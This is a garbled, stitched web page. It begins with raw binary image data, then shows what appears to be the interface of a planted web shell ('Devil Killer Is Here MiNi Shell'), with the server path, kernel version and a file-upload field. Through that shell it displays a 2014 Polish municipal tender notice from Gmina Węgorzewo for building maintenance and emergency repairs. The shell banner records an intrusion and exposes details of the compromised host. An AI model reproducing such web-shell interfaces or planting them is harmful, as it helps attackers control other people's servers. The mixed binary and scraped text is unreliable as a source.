JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140905/190285-N-2014.html

<p class="kh_header"><b>Węgorzewo: Bieżąca konserwacja oraz usuwanie awarii w budynkach i lokalach komunalnych
Gminy Węgorzewo.</b><br>
<b>Numer ogłoszenia: 190285 - 2014; data zamieszczenia: 05.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Węgorzewo , ul. Zamkowa 3, 11-600 Węgorzewo, woj. warmińsko-mazurskie, tel. 87 4275400, faks 87 4275401.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wegorzewo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca konserwacja oraz usuwanie awarii w budynkach i lokalach komunalnych
Gminy Węgorzewo..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Bieżąca konserwacja oraz usuwanie awarii w budynkach i lokalach komunalnych Gminy Węgorzewo.
1.Przedmiotem zamówienia jest wykonywanie bieżących konserwacji oraz usuwanie awarii polegających na wykonaniu prac pokrywczych, stolarskich, ciesielskich, murarsko-tynkarskich, malarskich, szklarskich, zduńskich, sanitarnych, gazowych, itp. w zasobach mieszkaniowych i użytkowych Gminy Węgorzewo.
2.Wymagany okres gwarancji na wykonane roboty (materiały i robociznę) wynosi
36 miesięcy, od dnia odebrania przez Zamawiającego robót budowlanych i podpisania (bez uwag) protokołu końcowego.
3.Zamówienie podzielono na II części, w których zakres robót budowlanych obejmować będzie następujące zadania: 
1) Część I : Konserwacja i usuwanie awarii w zakresie robót budowlanych
2) Część II:  Konserwacja i usuwanie awarii w zakresie robót sanitarnych
2. SZCZEGÓŁOWY ZAKRES ZAMÓWIENIA 
Część I - branża budowlana 
Zakres usług wykonywanych w branży budowlanej:
1)pełnienie pogotowia technicznego oraz niezwłoczne usuwanie awarii (i ich skutków) stwarzających zagrożenie dla życia, zdrowia lub mienia:
- usuwanie awarii w zakresie robót budowlanych w szczególnych sytuacjach awaryjnych oraz w sytuacjach zagrożenia życia lub mienia (np. włamania, pożar, kradzież, dewastacja),
- w sytuacji wystąpienia awarii niemożliwej do usunięcia poprzez naprawę-wymiana,
- przebudowa pieców kaflowych,
- usuwanie z połaci dachowej śniegu i lodu,
- inne czynności wykonywane na Zlecenie Zamawiającego, polegające na konserwacji lub usuwaniu awarii w zakresie robót budowlanych.
2) wykonywanie bieżącej konserwacji, w tym m.in.:
- naprawa miejscowo uszkodzonych tynków, uzupełnianie powłok malarskich na ścianach i sufitach,
- naprawa ubytków w ścianach, stropach, podłogach i posadzkach,
- uzupełnianie i naprawa izolacji cieplnych i zabezpieczeń przeciwwilgociowych,
- naprawa stolarki okiennej i drzwiowej, w tym: szklenie, wymiana okuć i elementów konstrukcyjnych stolarki, naprawa zawiasów, samozamykaczy, zamków i klamek,
- zabezpieczenie budynków na okres zimowy,
- uszczelnianie pokrycia dachu, drobne naprawy obróbek blacharskich, opierzeń, naprawa czyszczenie rynien, rur spustowych, kolan, rewizji,
- uzupełnienia i przemurowania kominów, gzymsów i murów ogniowych,
- naprawa i wymiana rur wywiewnych i kanalizacyjnych na dachu,
- usuwanie śniegu i lodu z dachów zagrażających bezpieczeństwu w okresie zimowym. W przypadku gdy szacunkowy koszt usunięcia awarii przekroczy wartość 500,00 zł przed przystąpieniem do jej usunięcia należy powiadomić Zamawiającego. 
Część II - branża sanitarna
Zakres usług wykonywanych w branży sanitarnej.
1) pełnienie pogotowia technicznego oraz niezwłoczne usuwanie awarii (i ich skutków) stwarzających zagrożenie dla życia, zdrowia lub mienia:
- usuwanie awarii w zakresie robót sanitarnych w szczególnych sytuacjach awaryjnych oraz w sytuacjach zagrożenia życia lub mienia (np. włamania, pożar, kradzież, dewastacja),
- zabezpieczenie przecieków instalacji - wodnej, kanalizacyjnej, centralnego ogrzewania i gazowych przez zamknięcie zaworów odcinających oraz ewentualne założenie opaski zaciskowej (bez wymiany odcinków rur) - za wyjątkiem braku możliwości dostępu do mieszkania,
- naprawa uszkodzonych zaworów podpionowych w głównych pionach i poziomach przez wymianę głowic lub uszczelek,
- przeczyszczenie i udrożnienie przewodów kanalizacyjnych w głównych pionach oraz poziomach,
- zabezpieczenie niesprawnych urządzeń gazowych i nieszczelności instalacji gazowej w budynku przez zamknięcie dopływu gazu oraz w razie potrzeby powiadomienie Pogotowia Gazowego,
- inne naprawy lub wymiany o charakterze awaryjnym usuwane będą po uzgodnieniu z osobą wyznaczoną przez Zamawiającego w ramach oddzielnego zlecenia,
- podejmowanie działań i dyspozycji, w przypadku awarii lub uszkodzeń przekraczających możliwości wykonawcze, przez uruchomienie innych służb lub wykonawców z powiadomieniem Zamawiającego o sytuacji.
 2) wykonywanie bieżącej konserwacji, w tym m.in.:
I. Przy instalacji centralnego ogrzewania:
- odpowietrzanie grzejników i instalacji,
- sprawdzanie stanu technicznego instalacji centralnego ogrzewania,
- płukanie instalacji centralnego ogrzewania,
- sprawdzanie i wskazanie miejsca przecieków, uszczelnienie instalacji wraz z wymianą uszkodzonych jej elementów.
II. Przy instalacji gazowej:
- sprawdzanie stanu technicznego instalacji gazowej w lokalach, potwierdzanie sprawności instalacji i urządzeń na protokole, wykonywanie próby szczelności instalacji i urządzeń,
- sprawdzanie i wskazanie miejsca przecieków, uszczelnienie instalacji wraz z wymianą uszkodzonych jej elementów,
- montaż stelaży pod gazomierz.
III. Przy instalacji wodno-kanalizacyjnej:
- sprawdzanie stanu technicznego instalacji wodno-kanalizacyjnej w budynkach i lokalach,
- sprawdzanie i wskazanie miejsca przecieków, uszczelnienie instalacji wraz z wymianą uszkodzonych jej elementów,
- czyszczenie i udrażnianie instalacji,
- zabezpieczenie instalacji w budynku na okres zimowy.
W przypadku gdy szacunkowy koszt usunięcia awarii przekroczy wartość 500,00 zł należy przed przystąpieniem do jej usunięcia powiadomić Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające do wysokości 50% wartości zamówienia podstawowego - art. 67 ust.1 pkt 6).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 50.00.00.00-5, 50.70.00.00-2, 50.80.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Każdy Wykonawca zobowiązany jest do wniesienia
wadium w wysokości: Zadanie I - 1 900,00 zł. Zadanie II - 200,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie 
          z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty złożone przez 
          wykonawcę w celu potwierdzenia warunków udziału w postępowaniu z uwzględnieniem 
          przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie wykluczeniem
          Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem oferty na
           podstawie art. 89 ust. 1 pkt 5 ustawy. Zamawiający uzna spełnienie powyższego warunku,
            jeżeli wykonawcy wykażą, że w okresie ostatnich 5 lat przed upływem terminu składania ofert 
           albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia jest 
           krótszy - w tym okresie wykonał minimum 1 zamówienie na roboty budowlane w zakresie: 
     a) w przypadku części pierwszej  - w zakresie niezwłocznego usuwania awarii (i ich skutków)
         oraz wykonywania bieżącej konserwacji w ramach jednej umowy, w zakresie robót 
         budowlanych o wartości min. 50 tys. zł. poparte dokumentem potwierdzającym, że roboty
         zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie 
         z zasadami sztuki budowlanej i prawidłowo ukończone.
    b)w przypadku części drugiej - w zakresie niezwłocznego usuwania awarii (i ich skutków) oraz 
         wykonywania bieżącej konserwacji w ramach jednej umowy w zakresie robót sanitarnych, 
        o wartości min.10 tys. zł. poparte dokumentem potwierdzającym, że roboty zostały wykonane
        w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki
        budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia 
          i dokumenty złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu
          z uwzględnieniem przepisów art. 26 ust.3 ustawy Pzp. Niespełnienie warunku skutkować będzie 
          wykluczeniem Wykonawcy z postępowania zgodnie z art. 24 ust. 2 ustawy oraz odrzuceniem 
          oferty na podstawie art.89 ust.1 pkt 5 ustawy. Warunek ten będzie spełniony przez Wykonawcę,
      jeżeli wykaże on, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności 
          osoby odpowiedzialne za kierowanie robotami budowlanymi (minimum jedna osoba): 
a)	w zakresie części  I - branża budowlana -posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz posiadają aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa
b)	w zakresie części II - branża sanitarna -posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz posiada aktualne zaświadczenie o przynależności do Izby Inżynierów Budownictwa</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zgodnie z formułą spełnia / nie spełnia, w oparciu o oświadczenia i dokumenty
       złożone przez wykonawcę w celu potwierdzenia warunków udziału w postępowaniu 
       z uwzględnieniem przepisów art. 26 ust.3 ustawy Pzp. Zamawiający uzna spełnienie
       powyższego warunku, jeżeli wykonawcy wykażą że posiadają opłaconą polisę, a w przypadku
       jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od
       odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem
       zamówienia na kwotę minimum 50 000 zł. brutto (dotyczy każdej części zamówienia). 
       Wykonawcy mogą polegać na zdolnościach finansowych innych podmiotów niezależnie od 
       charakteru prawnego łączących ich z nimi stosunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) formularz oferty, 
       b) w przypadku gdy wykonawca polega na zasobach niezbędnych do wykonania zamówienia
           innych podmiotów, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował tymi 
           zasobami, w szczególności przedstawi pisemne zobowiązanie tych podmiotów do dyspozycji 
           niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje wprowadzenie następujących zmian w umowie: 
1).Terminy dokonania poszczególnych czynności wskazanych w umowie mogą być zmienione w
     następujących sytuacjach :
a)	w przypadku opóźnienia w rozpoczęciu lub realizacji robót budowlanych lub dostaw, odbiorach robót, uzyskaniu pozwolenia na użytkowanie, rozliczeniu inwestycji - o ile opóźnienie nie wynika z przyczyn leżących po stronie Wykonawcy,
b)	w przypadku wydłużenia inwestycji z przyczyn niezależnych od Wykonawcy,
c)	w przypadku wystąpienia robót dodatkowych niezbędnych do wykonania inwestycji, których realizacja wymaga zmiany terminu wykonania inwestycji -  o czas ich realizacji,
d)	w przypadku zmian w dokumentacji projektowej mających wpływ na termin wykonania inwestycji,
e)	w razie zakłócenia toku robót budowlanych przez protesty społeczne i ingerencje osób trzecich oraz wstrzymanie budowy przez organ nadzoru budowlanego i inne organy nadzoru, ale tylko po stwierdzeniu zaniedbań niezawinionych przez Wykonawcę,
f)	jeżeli w otoczeniu budowy rozpoczęto realizację robót, które uniemożliwiają dostęp do placu budowy lub z przyczyn praktycznych, roboty w otoczeniu placu budowy powinny być wykonane wcześniej.
g)	w razie braku możliwości wykonania zamówienia zgodnie z dostarczoną dokumentacją i przekazanym placem budowy,
h)	w przypadku wystąpienia siły wyższej - zmiana wymaga zgody obu stron. Przez siłę wyższą rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i którym nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidziana dla cywilnoprawnych stosunków zobowiązaniowych.
4. Podstawą do ustalenia nowego terminu będzie ilość dni powodująca wstrzymanie  wykonywanie robót.
5. Wszelkie zmiany i uzupełnienia treści niniejszej umowy, a w szczególności zmiana zakresu robót wymagają pod rygorem nieważności zgody obu stron  wyrażonej na piśmie w formie aneksu.
6. Niedopuszczalna jest zmiana postanowień zawartej umowy oraz wprowadzenia nowych postanowień do umowy, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie której dokonano wyboru Wykonawcy, z wyjątkiem :
1)	sytuacji wymienionych w  ust. 3
2)	dokonania zmian w projekcie budowlanym,
3)	zmiany ceny, gdy:
a)	nastąpi urzędowa zmiana stawki podatku VAT,
b)	wystąpi różnica między obmiarem projektowym a obmiarem powykonawczym,
c)	Zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub materiały.
- podstawą ustalenia nowej ceny będą niezmienione ceny, stawki i narzuty z kosztorysu ofertowego.
4) podwykonawstwa - za uprzednią zgodą Zamawiającego :
a) powierzenia podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
b) powierzenia podwykonawcom części robót, mimo oświadczenia o samodzielnej realizacji zamówienia złożonego przez Wykonawcę w ofercie,
        5) pozostałym, w szczególności :
a) w przypadku zastosowania materiałów i technologii innych niż określone w umowie, pod warunkiem, że ich parametry techniczne i jakościowe nie będą gorsze niż wskazane w umowie - zmiana wymaga zgody obu stron,
b) zmian korzystnych dla Zamawiającego w szczególności obniżenia kosztów realizacji robót lub podwyższenie standardu realizowanej roboty,
c) nieprzewidywalnym na etapie wszczęcia postępowania, którego wprowadzenie jest niezbędne do  realizacji zamówienia,
d) zmiany formy organizacyjno prawnej, przekształcenia lub połączenia wykonawców,
e) doprecyzowania zapisów umowy
7.  Warunki zmian :
    1) inicjowanie zmian - na wniosek Wykonawcy lub Zamawiającego,
   2) uzasadnienie zmian - w szczególności: prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych 
i jakościowych robót,
    3) forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.
8. Zamawiający nie przedłuży terminu wykonania umowy, jeżeli zmiana będzie wymuszona uchybieniem (np. zbyt późne złożenie odpowiedniego wniosku) lub naruszeniem umowy przez Wykonawcę.
            a)	opóźnienia przekazania w ustalonych terminach placu budowy przez Zamawiającego,
b)	zlecenia robót dodatkowych lub zamiennych jeżeli terminy ich zlecenia, rodzaj lub zakres mają wpływ na pierwotny termin umowy,
c)	przerwy w realizacji robót powstałych na skutek przyczyn niezależnych od Wykonawcy i Zamawiającego np. awarie instalacji wewnątrz budynku, długotrwały brak dostawy prądu.
	d)	wstrzymania prac przez Zamawiającego albo przerw w wykonaniu prac powstałych z winy Zamawiającego a spowodowanych okolicznościami, których nie mógł przewidzieć w chwili zawarcia umowy, mających wpływ na prowadzenie i realizację usługi.
	2).	Dopuszcza się możliwość zmiany postanowień niniejszej umowy w przypadku:
a)	dokładniejszego doprecyzowania zapisów umowy,
b)	wprowadzenia zmian korzystnych dla Zamawiającego, w szczególności obniżenia 
kosztów zadania lub podniesienia standardu wykonywanego zadania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wegorzewo.pl; http://gmina.wegorzewo.sisco.info/?przetargi=1<br>
